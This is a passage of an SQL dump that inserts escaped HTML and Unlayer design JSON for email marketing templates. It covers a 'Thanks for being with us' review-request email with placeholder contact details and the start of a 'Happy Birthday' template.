<tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:23px 40px 10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #b8b8b8; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\">Call us: 111 222 333<br \\/>EMAIL: info@thecompany.com <br \\/>Address line \\/ Full contact addreess &amp; post code goes here<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:19px 19px 0px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"91%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #616888;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:15px 40px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #bbbbbb; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 12px; line-height: 16.8px;\\\">&copy; Shop Name&nbsp; |&nbsp; All Rights Reserved <\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n    <!--[if (mso)|(IE)]><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n  <\\/tbody>\\r\\n  <\\/table>\\r\\n  <!--[if mso]><\\/div><![endif]-->\\r\\n  <!--[if IE]><\\/div><![endif]-->\\r\\n<\\/body>\\r\\n\\r\\n<\\/html>\\r\\n\"', '\"{\\\"counters\\\":{\\\"u_row\\\":5,\\\"u_column\\\":6,\\\"u_content_text\\\":6,\\\"u_content_image\\\":3,\\\"u_content_button\\\":1,\\\"u_content_social\\\":1,\\\"u_content_divider\\\":2},\\\"body\\\":{\\\"id\\\":\\\"nY2UpNg7xs\\\",\\\"rows\\\":[{\\\"id\\\":\\\"CvMouKqZza\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"MIyWoeK0P3\\\",\\\"contents\\\":[{\\\"id\\\":\\\"wkMmc2BYL9\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"40px 10px 19px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1595747815584-a.png\\\",\\\"width\\\":204,\\\"height\\\":55,\\\"maxWidth\\\":\\\"26%\\\",\\\"autoWidth\\\":false},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_1\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"mWDZmdczN4\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_1\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 28px; line-height: 39.2px;\\\\\\\"><strong><span style=\\\\\\\"line-height: 39.2px; font-size: 28px;\\\\\\\">Thanks for being with us!<\\/span><\\/strong><\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"gVPK2KUKnF\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 26px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1595747900373-ssss.png\\\",\\\"width\\\":1000,\\\"height\\\":431},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_2\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_1\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#017ed0\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":false},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_1\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"RYZiqC9Ge_\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"_8LBi9___H\\\",\\\"contents\\\":[{\\\"id\\\":\\\"_s7AkbMQ6N\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"28px 33px 25px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#444444\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"200%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_3\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 200%;\\\\\\\"><span style=\\\\\\\"font-size: 22px; line-height: 44px;\\\\\\\">Hi,<\\/span><br \\/><span style=\\\\\\\"font-size: 16px; line-height: 32px;\\\\\\\">Thank you again for choosing us for your lorem ipsum dolor.&nbsp;<\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 200%;\\\\\\\"><span style=\\\\\\\"font-size: 16px; line-height: 32px;\\\\\\\">If you were happy with the efficiency of the service could I ask that you leave us some brief feedback on your experience via the link below.<\\/span><\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_5\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":false},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_4\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"TYDvAo7QXc\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"KkKlsm36KR\\\",\\\"contents\\\":[{\\\"id\\\":\\\"5XMfCB2N_C\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#272362\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"15px 44px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"40px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_1\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"font-size: 16px; line-height: 19.2px;\\\\\\\"><strong><span style=\\\\\\\"line-height: 19.2px; font-size: 16px;\\\\\\\">Review us on Google<\\/span><\\/strong><\\/span>\\\",\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":248,\\\"calculatedHeight\\\":49}},{\\\"id\\\":\\\"-3M3sEKxbS\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1595748338131-FWsY1nA.png\\\",\\\"width\\\":240,\\\"height\\\":110,\\\"maxWidth\\\":\\\"35%\\\",\\\"autoWidth\\\":false},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_3\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"jYPxTblxnF\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"84%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#d8d0d0\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"18px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_1\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_3\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":false},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_3\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"YbLHtpjkh0\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"jW9WWipw8d\\\",\\\"contents\\\":[{\\\"id\\\":\\\"HG30UIk3ly\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"19px 33px 40px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#272362\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_2\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 24px; line-height: 33.6px;\\\\\\\">Look forward to hearing from you&nbsp;<\\/span><br \\/><span style=\\\\\\\"font-size: 24px; line-height: 33.6px;\\\\\\\">in the near future.<\\/span><\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_2\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":false},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_2\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"04gNugS9ys\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"2mvPoFJCm5\\\",\\\"contents\\\":[{\\\"id\\\":\\\"ZA8TJ3zleD\\\",\\\"type\\\":\\\"social\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"30px 4px 4px\\\",\\\"anchor\\\":\\\"\\\",\\\"icons\\\":{\\\"iconType\\\":\\\"circle-white\\\",\\\"icons\\\":[{\\\"url\\\":\\\" \\\",\\\"name\\\":\\\"Facebook\\\"},{\\\"url\\\":\\\" \\\",\\\"name\\\":\\\"Twitter\\\"},{\\\"url\\\":\\\" \\\",\\\"name\\\":\\\"LinkedIn\\\"},{\\\"url\\\":\\\" \\\",\\\"name\\\":\\\"Instagram\\\"},{\\\"url\\\":\\\" \\\",\\\"name\\\":\\\"YouTube\\\"}],\\\"editor\\\":{\\\"data\\\":{\\\"showDefaultIcons\\\":true,\\\"showDefaultOptions\\\":true,\\\"customIcons\\\":[],\\\"customOptions\\\":[]}}},\\\"align\\\":\\\"center\\\",\\\"spacing\\\":19,\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_social_1\\\",\\\"htmlClassNames\\\":\\\"u_content_social\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"U54rwmEkOc\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"23px 40px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#b8b8b8\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_5\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\">Call us: 111 222 333<br \\/>EMAIL: info@thecompany.com&nbsp;<br \\/>Address line \\/ Full contact addreess &amp; post code goes here<\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"8hu9zilO_e\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"91%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#616888\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"19px 19px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_2\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"N9ssy1A_Ok\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"15px 40px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#bbbbbb\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_6\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 16.8px;\\\\\\\">&copy; Shop Name&nbsp; |&nbsp; All Rights Reserved <\\/span><\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_6\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#272362\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":false},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_5\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}}],\\\"values\\\":{\\\"popupPosition\\\":\\\"center\\\",\\\"popupWidth\\\":\\\"600px\\\",\\\"popupHeight\\\":\\\"auto\\\",\\\"borderRadius\\\":\\\"10px\\\",\\\"contentAlign\\\":\\\"center\\\",\\\"contentVerticalAlign\\\":\\\"center\\\",\\\"contentWidth\\\":\\\"600px\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Open Sans\\\",\\\"value\\\":\\\"\'Open Sans\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,700\\\",\\\"defaultFont\\\":true},\\\"textColor\\\":\\\"#000000\\\",\\\"popupBackgroundColor\\\":\\\"#FFFFFF\\\",\\\"popupBackgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":true},\\\"popupOverlay_backgroundColor\\\":\\\"rgba(0, 0, 0, 0.1)\\\",\\\"popupCloseButton_position\\\":\\\"top-right\\\",\\\"popupCloseButton_backgroundColor\\\":\\\"#DDDDDD\\\",\\\"popupCloseButton_iconColor\\\":\\\"#000000\\\",\\\"popupCloseButton_borderRadius\\\":\\\"0px\\\",\\\"popupCloseButton_margin\\\":\\\"0px\\\",\\\"popupCloseButton_action\\\":{\\\"name\\\":\\\"close_popup\\\",\\\"attrs\\\":{\\\"onClick\\\":\\\"document.querySelector(\'.u-popup-container\').style.display = \'none\';\\\"}},\\\"backgroundColor\\\":\\\"#ffffff\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":false},\\\"preheaderText\\\":\\\"\\\",\\\"linkStyle\\\":{\\\"body\\\":true,\\\"linkColor\\\":\\\"#363675\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":false,\\\"linkHoverUnderline\\\":true,\\\"inherit\\\":false},\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_body\\\",\\\"htmlClassNames\\\":\\\"u_body\\\"}}},\\\"schemaVersion\\\":9}\"', '', 0, '2022-08-29 11:44:07');
INSERT INTO `tblma_email_templates` (`id`, `name`, `color`, `category`, `published`, `language`, `data_html`, `data_design`, `description`, `addedfrom`, `dateadded`) VALUES
(6, 'Happy Birthday', '', 0, 1, 'english', '\"<!DOCTYPE HTML PUBLIC \\\"-\\/\\/W3C\\/\\/DTD XHTML 1.0 Transitional \\/\\/EN\\\" \\\"http:\\/\\/www.w3.org\\/TR\\/xhtml1\\/DTD\\/xhtml1-transitional.dtd\\\">\\r\\n<html xmlns=\\\"http:\\/\\/www.w3.org\\/1999\\/xhtml\\\" xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:o=\\\"urn:schemas-microsoft-com:office:office\\\">\\r\\n<head>\\r\\n<!--[if gte mso 9]>\\r\\n<xml>\\r\\n  <o:OfficeDocumentSettings>\\r\\n    <o:AllowPNG\\/>\\r\\n    <o:PixelsPerInch>96<\\/o:PixelsPerInch>\\r\\n  <\\/o:OfficeDocumentSettings>\\r\\n<\\/xml>\\r\\n<![endif]-->\\r\\n  <meta http-equiv=\\\"Content-Type\\\" content=\\\"text\\/html; charset=UTF-8\\\">\\r\\n  <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\">\\r\\n  <meta name=\\\"x-apple-disable-message-reformatting\\\">\\r\\n  <!--[if !mso]><!--><meta http-equiv=\\\"X-UA-Compatible\\\" content=\\\"IE=edge\\\"><!--<![endif]-->\\r\\n  <title><\\/title>\\r\\n  \\r\\n    <style type=\\\"text\\/css\\\">\\r\\n      @media only screen and (min-width: 620px) {\\r\\n  .u-row {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    vertical-align: top;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-100 {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n\\r\\n}\\r\\n\\r\\n@media (max-width: 620px) {\\r\\n  .u-row-container {\\r\\n    max-width: 100% !important;\\r\\n    padding-left: 0px !important;\\r\\n    padding-right: 0px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    min-width: 320px !important;\\r\\n    max-width: 100% !important;\\r\\n    display: block !important;\\r\\n  }\\r\\n  .u-row {\\r\\n    width: calc(100% - 40px) !important;\\r\\n  }\\r\\n  .u-col {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col > div {\\r\\n    margin: 0 auto;\\r\\n  }\\r\\n}\\r\\nbody {\\r\\n  margin: 0;\\r\\n  padding: 0;\\r\\n}\\r\\n\\r\\ntable,\\r\\ntr,\\r\\ntd {\\r\\n  vertical-align: top;\\r\\n  border-collapse: collapse;\\r\\n}\\r\\n\\r\\np {\\r\\n  margin: 0;\\r\\n}\\r\\n\\r\\n.ie-container table,\\r\\n.mso-container table {\\r\\n  table-layout: fixed;\\r\\n}\\r\\n\\r\\n* {\\r\\n  line-height: inherit;\\r\\n}\\r\\n\\r\\na[x-apple-data-detectors=\'true\'] {\\r\\n  color: inherit !important;\\r\\n  text-decoration: none !important;\\r\\n}\\r\\n\\r\\ntable, td { color: #000000; } #u_body a { color: #0000ee; text-decoration: underline; }\\r\\n    <\\/style>\\r\\n  \\r\\n  \\r\\n\\r\\n<!--[if !mso]><!--><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Raleway:400,700&display=swap\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><!--<![endif]-->\\r\\n\\r\\n<\\/head>\\r\\n\\r\\n<body 